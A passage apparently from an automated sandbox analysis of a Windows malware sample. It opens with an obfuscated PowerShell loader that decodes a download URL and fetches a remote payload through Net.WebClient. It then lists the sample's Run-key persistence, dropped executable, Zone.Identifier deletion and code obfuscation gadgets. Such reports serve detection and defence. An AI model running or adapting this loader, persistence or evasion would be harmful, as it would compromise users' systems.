C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,	Jump to behavior

Binary contains a suspicious time stamp

Source: GrOcCQC.exe.15.dr

Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]

PE file contains sections with non-standard names

Source: GrOcCQC.exe.15.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFE57817E38 push eax; retf	9_2_00007FFE57817E41
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFE578100BD pushad ; iretd	9_2_00007FFE578100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFE578E2E8D push eax; retf	9_2_00007FFE578E2E8E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_046B93A5 push eax; retf	13_2_046B93A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07591FC8 push eax; mov dword ptr [esp], ecx	13_2_075921B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B044E9 push 8BD38B50h; iretd	13_2_08B044EF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B0427E push 8BD68B50h; iretd	13_2_08B04291
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B01B3B push FFFFFFE8h; iretd	13_2_08B01B3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08B04748 push 8BD38B50h; iretd	13_2_08B0474E
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E13F8 pushfd ; retf	16_2_007E13F9
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E376D push ecx; ret	16_2_007E3780

Drops PE files

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

Jump to dropped file

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrOcCQC			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrOcCQC			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe:Zone.Identifier read attributes | delete

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
